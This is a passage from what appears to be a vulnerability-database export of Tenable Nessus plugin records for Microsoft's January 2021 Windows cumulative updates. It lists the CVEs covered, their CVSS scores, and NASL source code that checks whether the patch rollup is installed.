(CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. 
(CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Hyper-V Denial of Service Vulnerability This CVE ID is unique from CVE-2021-1691. (CVE-2021-1692)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598243/windows-10-update-kb4598243\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b30e3c7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598243.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-1694\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows 
: Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598243'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598243])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-03T14:52:17", "description": "The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1685. 
(CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. 
(CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700, CVE-2021-1701. 
(CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638, CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681, CVE-2021-1686, CVE-2021-1687. (CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652, CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. 
(CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Docker Information Disclosure Vulnerability (CVE-2021-1645)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683, CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T00:00:00", "type": "nessus", "title": "KB4598230: Windows 10 Version 1809 and Windows Server 2019 January 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1642", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", 
"CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_JAN_4598230.NASL", "href": "https://www.tenable.com/plugins/nessus/144887", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144887);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\n \"CVE-2021-1637\",\n \"CVE-2021-1638\",\n \"CVE-2021-1642\",\n \"CVE-2021-1645\",\n \"CVE-2021-1646\",\n \"CVE-2021-1648\",\n \"CVE-2021-1649\",\n \"CVE-2021-1650\",\n \"CVE-2021-1651\",\n \"CVE-2021-1652\",\n \"CVE-2021-1653\",\n \"CVE-2021-1654\",\n \"CVE-2021-1655\",\n \"CVE-2021-1656\",\n \"CVE-2021-1657\",\n \"CVE-2021-1658\",\n \"CVE-2021-1659\",\n \"CVE-2021-1660\",\n \"CVE-2021-1661\",\n \"CVE-2021-1662\",\n \"CVE-2021-1664\",\n \"CVE-2021-1665\",\n \"CVE-2021-1666\",\n \"CVE-2021-1667\",\n \"CVE-2021-1668\",\n \"CVE-2021-1669\",\n \"CVE-2021-1671\",\n \"CVE-2021-1672\",\n \"CVE-2021-1673\",\n \"CVE-2021-1674\",\n \"CVE-2021-1676\",\n \"CVE-2021-1678\",\n \"CVE-2021-1679\",\n \"CVE-2021-1680\",\n \"CVE-2021-1681\",\n 
\"CVE-2021-1682\",\n \"CVE-2021-1683\",\n \"CVE-2021-1684\",\n \"CVE-2021-1685\",\n \"CVE-2021-1686\",\n \"CVE-2021-1687\",\n \"CVE-2021-1688\",\n \"CVE-2021-1689\",\n \"CVE-2021-1690\",\n \"CVE-2021-1693\",\n \"CVE-2021-1694\",\n \"CVE-2021-1695\",\n \"CVE-2021-1696\",\n \"CVE-2021-1697\",\n \"CVE-2021-1699\",\n \"CVE-2021-1700\",\n \"CVE-2021-1701\",\n \"CVE-2021-1702\",\n \"CVE-2021-1704\",\n \"CVE-2021-1705\",\n \"CVE-2021-1706\",\n \"CVE-2021-1708\",\n \"CVE-2021-1709\",\n \"CVE-2021-1710\"\n );\n script_xref(name:\"MSKB\", value:\"4598230\");\n script_xref(name:\"MSFT\", value:\"MS21-4598230\");\n script_xref(name:\"IAVA\", value:\"2021-A-0023-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0015-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0022-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0001\");\n\n script_name(english:\"KB4598230: Windows 10 Version 1809 and Windows Server 2019 January 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1685. (CVE-2021-1642)\n\n - Windows DNS Query Information Disclosure Vulnerability (CVE-2021-1637)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1680. (CVE-2021-1651)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1653,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1652)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. 
(CVE-2021-1653)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. 
